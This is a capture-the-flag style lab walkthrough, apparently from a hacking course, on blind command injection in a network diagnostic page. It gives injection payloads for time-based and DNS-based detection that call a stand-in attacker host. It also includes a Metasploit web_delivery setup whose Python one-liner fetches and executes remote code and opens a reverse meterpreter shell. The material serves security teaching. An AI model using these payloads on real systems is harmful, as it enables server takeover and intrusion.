Blind command injection is one form of command injection, where a malicious user inputs commands into a software that the program processes, but the user does not receive any information about the impact of the inputted command. This makes the attack more difficult to detect, as the user does not realize that their inputted data has been processed and potentially caused harm to the system.

In this module, we will solve the lab together. If you wish, you can stop reading and try to solve it yourself. Otherwise, you can follow the steps below at your own pace.

Obtain root access to the server and read the flag from the file /flag.txt.

In this exercise, you will exploit a vulnerable network diagnostic page and gain control over the server. This time, the output of the commands will not be reflected back.

Command Injection 2

When you want to check if a system is vulnerable, you can try to cause a delay by using the sleep or /bin/sleep program. You can also try using the ping command, which causes a delay depending on the number of packets.

Start netcat listener on the attacker's computer on UDP port 53.


Try now to make the system perform a DNS request. For example, using one of the following commands:

If you see something like this in your terminal, the target is likely vulnerable.

At this point, it is good to mention that there are numerous different ways on how to proceed from here. In this module, we use the 

 program, which we use to try to access the server's command line. Metasploit is an open-source cybersecurity tool that contains several ready-made attack modules and helps to test and evaluate system security. It is a popular tool among both cybersecurity experts and hackers and can be used for both simulating attacks and testing defense techniques.

Select Python meterpreter reverse TCP payload as follows:

Set LHOST and SRVHOST settings to your local IP address (from the previous command):

When you are satisfied with the settings, use the "run" command to start the listener.

Force the web application to execute the Python command printed in Metasploit. After this, the following should be visible in the Metasploit console:

To establish interaction with the meterpreter session, execute the command sessions -i {number} as follows:

To drop to the command line, simply execute the shell command:

With the cat command, you can read the contents of the /flag.txt file.

Tip: Meterpreter can be a bit shaky at times, so it is advisable to first patiently wait for the "Meterpreter session to open". However, if this does not seem to succeed or the connection dies in the middle of everything, it is worth trying, for example, to place the & character after the command injection, as it sets the command to run in the background

## What is blind injection?

Blind command injection is one form of command injection, where a malicious user inputs commands into a software that the program processes, but the user does not receive any information about the impact of the inputted command. This makes the attack more difficult to detect, as the user does not realize that their inputted data has been processed and potentially caused harm to the system.

*In this module, we will solve the lab together. If you wish, you can stop reading and try to solve it yourself. Otherwise, you can follow the steps below at your own pace.*

@exercise 59d12f00ef07

---

## Detecting Vulnerabilities

### Time-based detection

When you want to check if a system is vulnerable, you can try to cause a delay by using the sleep or /bin/sleep program. You can also try using the ping command, which causes a delay depending on the number of packets.

```sh
test; sleep 5
```

```sh
test;/bin/sleep 5
```

```sh
test;ping -c 5 127.0.0.1
```

### DNS-based detection

Start netcat listener on the attacker's computer on UDP port 53.

```sh
nc -v -u -l -p 53
Bound is 0.0.0.0 53
```

Try now to make the system perform a DNS request. For example, using one of the following commands:

```sh
test; curl something. attacker. local
test;ping something.attacker.local
test; host something. attacker. local
test; wget something. attacker. local
test;nslookup something.attacker.local
test; dig something. attacker. local
```

If you see something like this in your terminal, the target is likely vulnerable.

```sh
Connection received on 10.2.1.74 29082
SU somethinattackerlocal�m somethinattackerlocal
```

---

## Exploitation of Vulnerability

At this point, it is good to mention that there are numerous different ways on how to proceed from here. In this module, we use the **Metasploit** program, which we use to try to access the server's command line. Metasploit is an open-source cybersecurity tool that contains several ready-made attack modules and helps to test and evaluate system security. It is a popular tool among both cybersecurity experts and hackers and can be used for both simulating attacks and testing defense techniques.

You can launch **Metasploit** as follows:

```sh
msfconsole
```

Next, we select the web delivery module:

```sh
msf6 > use exploit/multi/script/web_delivery
```

Select Python meterpreter reverse TCP payload as follows:

```sh
msf6 exploit(multi/script/web_delivery) > set payload python/meterpreter/reverse_tcp
```

To see the available settings, execute:

```sh
msf6 exploit(multi/script/web_delivery) > show options
```

To obtain your IP address:

```sh
msf6 exploit(multi/script/web_delivery) > ip a
...
4: eth0@if78: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1440 qdisc noqueue state UP group default
link/ether c2:9f:64:41:c5:02 brd ff:ff:ff:ff:ff:ff link-netnsid 0
inet 10.2.1.72/32 scope global eth0
valid_lft forever preferred_lft forever
```

Set LHOST and SRVHOST settings to your local IP address (from the previous command):

```sh
msf6 exploit(multi/script/web_delivery) > set SRVHOST 10.2.1.72
SRVHOST => 10.2.1.72
msf6 exploit(multi/script/web_delivery) > set LHOST 10.2.1.72
LHOST => 10.2.1.72
```

When you are satisfied with the settings, use the "run" command to start the listener.

```sh
msf6 exploit(multi/script/web_delivery) > run
[*] Exploit running as background job 0.
[*] Exploit completed, but no session was created.

[*] Started reverse TCP handler is 10.2.1.72:4444
[*] Using URL: http://10.2.1.72:8080/WLM5JwM
[*] Server started.
[*] Run the following command on the target machine:
python -c "import sys;import ssl;u=__import__('urllib'+{2:'',3:'.request'}[sys.version_info[0]],fromlist=('urlopen',)); r=u.urlopen('http://10.2.1.72:8080/WLM5JwM', context=ssl._create_unverified_context());exec(r.read());"
```

Force the web application to execute the Python command printed in Metasploit. After this, the following should be visible in the Metasploit console:

```sh
[*] Meterpreter session 1 opened (10.2.1.72:4444 -> 10.2.1.74:44568) at 2021-05-11 12:12:50 +0000
```

To establish interaction with the meterpreter session, execute the command sessions -i \{number\} as follows:

```sh
msf6 exploit(multi/script/web_delivery) > sessions -i 1
[*] Starting interaction with 1...

meterpreter >
```

To drop to the command line, simply execute the shell command:

```sh
meterpreter > shell
Process 35 created.
Channel 2 created.
/bin/sh: 0: can't access tty; job control turned off

```

With the cat command, you can read the contents of the /flag.txt file.

![](sanity:image-f5e4b2b39254195283176dbb3d9541fd882f5bcc-576x154-png)

*Tip: Meterpreter can be a bit shaky at times, so it is advisable to first patiently wait for the "Meterpreter session to open". However, if this does not seem to succeed or the connection dies in the middle of everything, it is worth trying, for example, to place the & character after the command injection, as it sets the command to run in the background*.


Blind Command Injection

One of the scariest places an injection vulnerability can hit is operating system commands. The penalty is almost always a complete takeover of the server by the attacker. However, these vulnerabilities are found quite often when the application uses, for example, command line tools behind the scenes.

One of the scariest places where an injection vulnerability can hit is operating system commands. The consequence is almost always the complete takeover of the server by the attacker. However, these vulnerabilities are quite often found when an application uses command-line tools behind the scenes.

Blind Command Injection

What is blind injection?

Learn to hack — start here